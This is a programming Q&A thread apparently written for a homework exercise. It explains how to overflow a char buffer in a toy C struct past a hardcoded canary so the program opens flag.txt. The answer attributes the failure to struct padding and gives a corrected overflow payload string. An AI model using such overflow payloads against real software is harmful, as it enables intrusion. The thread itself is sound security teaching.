# Exploit a buffer overflow with canary protection

Tags: c, gdb, buffer-overflow, exploit, cracking

I'm trying to exploit this simple program for homework:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSIZE 1024

typedef struct {
    char flag_content[BUFSIZE];
    char guess[47];
    unsigned canary;
    char flag_file[BUFSIZE];
} st_t;

int main(){
    FILE *f = NULL;
    st_t st = {
        .flag_file = "fake_flag",
        .canary = 0x4249b876
    };

    printf("Guess the flag!\n");
    scanf("%s", st.guess);

    f = fopen(st.flag_file, "rb");
    if (f == NULL){
        printf("flag error\n");
        exit(-1);
    }

    if (fread(st.flag_content, BUFSIZE, 1, f) < 0){
        printf("flag error\n");
        exit(-1);
    }

    if (st.canary != 0x4249b876) {
        printf("canary error\n");
        exit(-1);
    }

    if (!strcmp(st.guess, st.flag_content)){
        printf("You guessed it right!\n");
    } else {
        printf("Sorry but the flag is \"%s\"\n", st.flag_content);
    }
    exit(1);
}
```

The purpose is to modify the `st.flag_file` inserting `"flag.txt"` instead of `"fake_flag.txt"` to read its content.

It's easy to find out that there is a buffer overflow, but there is also a canary, so I write this exploit as input of the `scanf`:

```
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv¸IBflag.txt
```

I found online that the hexadecimal `0x4249b876` is translated into `v¸IB`
but when I run the code from my terminal this is the output

```
./mission1
Guess the flag!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv¸IBflag.txt
canary error
```

and doing a check with gdb I found out that the variable `st.flag_file = "flag.txt"` that is correct but the variable `st.canary = 0x4249b8c2`

I cannot understand. Why?

Answer (score 2, accepted):

The problem you are having comes from the alignment requirements of the `struct`. In particular, between the `guess` and the `canary` there is extra padding that the compiler is inserting. Try to dump the entire structure and/or the addresses of the members and you will see the padding.

The end result is that you will need more than 47 bytes (`A`) to reach the `canary`, typically one more. So instead of, e.g.:

```
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x76\xb8\x49\x42flag
```

You will need:

```
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x76\xb8\x49\x42flag
```

Take note, as well, that escaping the characters for the canary might be a good idea (to avoid problems with encoding etc.) and makes it more readable (to compare against the actual canary).

<sup>*Off-topic*</sup> Note that:

```
fread(st.flag_content, BUFSIZE, 1, f) < 0
```

is always false since `fread` returns a `size_t` (unsigned).

Comment: Sorry if I ask you this question after so long but, I tried to solve this on my own during the last week. Do you know why if i escape the character for the canary the computer doesn't read as hexadecimal but as string??

Comment: @Kordo: Not sure what do you mean -- how are you passing the string into the process?

Comment: from my terminal I run the compiled program with  './<program_name> ' and then under the text _Guess the flag_ i paste the string.

Comment: @Kordo: Try echoing it with `-n` and `-e` and piping it into the program.